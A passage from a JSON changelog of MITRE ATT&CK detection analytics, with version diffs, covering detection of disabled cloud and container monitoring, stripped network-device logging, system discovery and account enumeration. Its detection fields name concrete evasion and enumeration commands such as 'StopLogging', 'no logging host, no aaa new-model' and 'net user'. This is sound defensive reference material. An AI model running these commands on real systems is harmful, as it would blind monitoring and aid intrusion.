                    "id": "x-mitre-analytic--5d329e39-a38b-47cd-8d3d-fa7515280fd7",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:31:55.528000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1372",
                            "external_id": "AN1372"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1372",
                    "description": "Correlates control-plane API actions disabling cloud-native monitoring or sensor agents (CloudTrail, GuardDuty, Security Hub, Defender, monitoring agents), role abuse preceding disablement, or instance agent uninstall events",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--e52d89f9-1710-4708-88a5-cbef77c4cd5e",
                            "name": "AWS:CloudTrail",
                            "channel": "Delete* / Stop*: DeleteAlarms, StopLogging, or DisableMonitoring API calls"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "APIActions",
                            "description": "Customizable list of cloud provider API calls related to monitoring/alerting disablement."
                        },
                        {
                            "field": "UserContext",
                            "description": "Distinguishes adversary actions from authorized DevOps/CloudOps activities."
                        }
                    ],
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:31:55.528000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates control-plane API actions disabling cloud-native monitoring or sensor agents (CloudTrail, GuardDuty, Security Hub, Defender, monitoring agents), role abuse preceding disablement, or instance agent uninstall events\", \"old_value\": \"Detection of adversaries disabling cloud monitoring and logging agents such as CloudWatch, Google Cloud Monitoring, or Azure Monitor by API calls or agent process termination.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to50__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to50__0\"><a href=\"#difflib_chg_to50__top\">t</a></td><td class=\"diff_header\" id=\"from50_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;adversaries&nbsp;disabling&nbsp;cloud&nbsp;monitoring&nbsp;and&nbsp;logg</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to50__top\">t</a></td><td class=\"diff_header\" id=\"to50_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;control-plane&nbsp;API&nbsp;actions&nbsp;disabling&nbsp;cloud-native&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ing&nbsp;agents&nbsp;such&nbsp;as&nbsp;CloudWatch,&nbsp;Google&nbsp;Cloud&nbsp;Monitoring,&nbsp;or&nbsp;A</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">monitoring&nbsp;or&nbsp;sensor&nbsp;agents&nbsp;(CloudTrail,&nbsp;GuardDuty,&nbsp;Security</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">zure&nbsp;Monitor&nbsp;by&nbsp;API&nbsp;calls&nbsp;or&nbsp;agent&nbsp;process&nbsp;termination.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;Hub,&nbsp;Defender,&nbsp;monitoring&nbsp;agents),&nbsp;role&nbsp;abuse&nbsp;preceding&nbsp;dis</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ablement,&nbsp;or&nbsp;instance&nbsp;agent&nbsp;uninstall&nbsp;events</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f421cbe1-d42e-45e9-adad-12c6ed0a5cb8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:33:43.898000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1373",
                            "external_id": "AN1373"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1373",
                    "description": "Detects disabling container runtime security controls, removing sidecar sensors, modifying seccomp/AppArmor profiles, mounting host proc/sys paths to interfere with host logging, or killing in-container monitoring agents.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
                            "name": "kubernetes:audit",
                            "channel": "kubectl delete or patch of security pods/admission controllers"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "NamespaceExclusions",
                            "description": "Exclusion of namespaces where temporary deletion of monitoring tools is legitimate (e.g., staging)."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Containers"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:33:43.898000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detects disabling container runtime security controls, removing sidecar sensors, modifying seccomp/AppArmor profiles, mounting host proc/sys paths to interfere with host logging, or killing in-container monitoring agents.\", \"old_value\": \"Detection of adversaries tampering with container runtime security plugins, disabling admission controllers, or stopping monitoring sidecars.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to53__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to53__0\"><a href=\"#difflib_chg_to53__top\">t</a></td><td class=\"diff_header\" id=\"from53_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;adversaries&nbsp;tampering&nbsp;with&nbsp;container&nbsp;runtime&nbsp;se</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to53__top\">t</a></td><td class=\"diff_header\" id=\"to53_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detects&nbsp;disabling&nbsp;container&nbsp;runtime&nbsp;security&nbsp;controls,&nbsp;remov</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">curity&nbsp;plugins,&nbsp;disabling&nbsp;admission&nbsp;controllers,&nbsp;or&nbsp;stopping</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing&nbsp;sidecar&nbsp;sensors,&nbsp;modifying&nbsp;seccomp/AppArmor&nbsp;profiles,&nbsp;mo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;monitoring&nbsp;sidecars.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">unting&nbsp;host&nbsp;proc/sys&nbsp;paths&nbsp;to&nbsp;interfere&nbsp;with&nbsp;host&nbsp;logging,&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;killing&nbsp;in-container&nbsp;monitoring&nbsp;agents.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--e542342f-5a08-408d-b292-797bcb2da5eb",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:33:32.261000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1374",
                            "external_id": "AN1374"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1374",
                    "description": "Detects disabling AAA, syslog, SNMP traps, ACL logging, or security features on routers/switches/firewalls; correlates privileged login followed by configuration commit reducing visibility.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
                            "name": "networkdevice:config",
                            "channel": "write: Startup configuration changes disabling security checks"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "networkdevice:syslog",
                            "channel": "no logging host, no aaa new-model, no snmp-server, commit"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ConfigBaseline",
                            "description": "Reference configuration state for detecting unauthorized modifications."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:33:32.261000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detects disabling AAA, syslog, SNMP traps, ACL logging, or security features on routers/switches/firewalls; correlates privileged login followed by configuration commit reducing visibility.\", \"old_value\": \"Detection of adversaries modifying startup configuration files to disable signature verification, logging, or monitoring features.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"networkdevice:syslog\", \"channel\": \"no logging host, no aaa new-model, no snmp-server, commit\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to58__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to58__0\"><a href=\"#difflib_chg_to58__top\">t</a></td><td class=\"diff_header\" id=\"from58_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;adversaries&nbsp;modifying&nbsp;startup&nbsp;configuration&nbsp;fil</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to58__top\">t</a></td><td class=\"diff_header\" id=\"to58_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detects&nbsp;disabling&nbsp;AAA,&nbsp;syslog,&nbsp;SNMP&nbsp;traps,&nbsp;ACL&nbsp;logging,&nbsp;or&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">es&nbsp;to&nbsp;disable&nbsp;signature&nbsp;verification,&nbsp;logging,&nbsp;or&nbsp;monitoring</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ecurity&nbsp;features&nbsp;on&nbsp;routers/switches/firewalls;&nbsp;correlates&nbsp;p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;features.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rivileged&nbsp;login&nbsp;followed&nbsp;by&nbsp;configuration&nbsp;commit&nbsp;reducing&nbsp;vi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sibility.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--54bfcc92-e04c-4eac-9aa2-c10b7574088c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 22:32:32.447000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0525#AN1452",
                            "external_id": "AN1452"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1452",
                    "description": "Detection of processes executing system environment inspection operations followed by access to OS configuration APIs or registry locations that expose OS version, architecture, patch level, or hardware characteristics. Defenders observe process execution retrieving system configuration metadata immediately after process startup.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4688"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=13, 14"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Detect multiple discovery commands executed in short succession."
                        },
                        {
                            "field": "UserContext",
                            "description": "Scope alerts to unusual user accounts or service accounts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 22:32:32.447000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['description']\": {\"new_value\": \"Detection of processes executing system environment inspection operations followed by access to OS configuration APIs or registry locations that expose OS version, architecture, patch level, or hardware characteristics. Defenders observe process execution retrieving system configuration metadata immediately after process startup.\", \"old_value\": \"Process creation and command-line execution of native system discovery utilities such as `systeminfo`, `hostname`, `wmic`, or use of PowerShell/WMI for system enumeration.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"WinEventLog:Sysmon\", \"channel\": \"EventCode=1\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170\", \"name\": \"WinEventLog:Sysmon\", \"channel\": \"EventCode=13, 14\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to56__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to56__0\"><a href=\"#difflib_chg_to56__top\">t</a></td><td class=\"diff_header\" id=\"from56_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Process&nbsp;creation&nbsp;and&nbsp;command-line&nbsp;execution&nbsp;of&nbsp;native&nbsp;system</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to56__top\">t</a></td><td class=\"diff_header\" id=\"to56_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detection&nbsp;of&nbsp;processes&nbsp;executing&nbsp;system&nbsp;environment&nbsp;inspecti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;discovery&nbsp;utilities&nbsp;such&nbsp;as&nbsp;`systeminfo`,&nbsp;`hostname`,&nbsp;`wmic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;operations&nbsp;followed&nbsp;by&nbsp;access&nbsp;to&nbsp;OS&nbsp;configuration&nbsp;APIs&nbsp;or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">`,&nbsp;or&nbsp;use&nbsp;of&nbsp;PowerShell/WMI&nbsp;for&nbsp;system&nbsp;enumeration.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;registry&nbsp;locations&nbsp;that&nbsp;expose&nbsp;OS&nbsp;version,&nbsp;architecture,&nbsp;pa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tch&nbsp;level,&nbsp;or&nbsp;hardware&nbsp;characteristics.&nbsp;Defenders&nbsp;observe&nbsp;pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ocess&nbsp;execution&nbsp;retrieving&nbsp;system&nbsp;configuration&nbsp;metadata&nbsp;imm</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ediately&nbsp;after&nbsp;process&nbsp;startup.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--e576eaeb-2158-40f9-8edb-c119eac56442",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 22:22:07.647000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1612",
                            "external_id": "AN1612"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1612",
                    "description": "Detection of processes performing local or domain account enumeration by invoking account directory queries or security APIs followed by structured output of account lists. The defender observes command execution or API invocation patterns that retrieve account information and produce enumeration artifacts shortly afterward.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4688"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe",
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4798, 4799"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "CommandLinePattern",
                            "description": "Match variations in enumeration commands like 'net user', 'Get-ADUser', 'dsquery'."
                        },
                        {
                            "field": "TimeWindow",
                            "description": "Short burst of account enumeration commands may indicate automation."
                        },
                        {
                            "field": "UserContext",
                            "description": "Restrict to non-admin accounts or unexpected users executing enumeration commands."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 22:22:07.647000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detection of processes performing local or domain account enumeration by invoking account directory queries or security APIs followed by structured output of account lists. The defender observes command execution or API invocation patterns that retrieve account information and produce enumeration artifacts shortly afterward.\", \"old_value\": \"Detection of suspicious enumeration of local or domain accounts via command-line tools, WMI, or scripts.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"WinEventLog:Security\", \"channel\": \"EventCode=4688\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe\", \"name\": \"WinEventLog:Security\", \"channel\": \"EventCode=4798, 4799\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to51__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to51__0\"><a href=\"#difflib_chg_to51__top\">t</a></td><td class=\"diff_header\" id=\"from51_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;suspicious&nbsp;enumeration&nbsp;of&nbsp;local&nbsp;or&nbsp;domain&nbsp;accou</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to51__top\">t</a></td><td class=\"diff_header\" id=\"to51_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detection&nbsp;of&nbsp;processes&nbsp;performing&nbsp;local&nbsp;or&nbsp;domain&nbsp;account&nbsp;en</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nts&nbsp;via&nbsp;command-line&nbsp;tools,&nbsp;WMI,&nbsp;or&nbsp;scripts.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">umeration&nbsp;by&nbsp;invoking&nbsp;account&nbsp;directory&nbsp;queries&nbsp;or&nbsp;security&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">APIs&nbsp;followed&nbsp;by&nbsp;structured&nbsp;output&nbsp;of&nbsp;account&nbsp;lists.&nbsp;The&nbsp;def</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ender&nbsp;observes&nbsp;command&nbsp;execution&nbsp;or&nbsp;API&nbsp;invocation&nbsp;patterns&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">that&nbsp;retrieve&nbsp;account&nbsp;information&nbsp;and&nbsp;produce&nbsp;enumeration&nbsp;ar</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tifacts&nbsp;shortly&nbsp;afterward.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--24aa5ee9-ba7f-4991-b32a-27d40ee2d010",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 22:24:28.695000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0587#AN1614",
                            "external_id": "AN1614"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1614",
                    "description": "Detection of account enumeration through directory service queries or system utilities accessing account metadata stores, followed by structured enumeration output.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "macos:unifiedlog",
                            "channel": "process event"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0",
                            "name": "macos:unifiedlog",
                            "channel": "DirectoryService queries retrieving account information"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "CommandLine",
                            "description": "Tune for dscl -list, dscacheutil -q user, id -un, etc."
                        },
                        {
                            "field": "ExecutionContext",
                            "description": "Alert if enumeration is performed in non-console session or by unusual users."
                        }
                    ],
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "1.1",
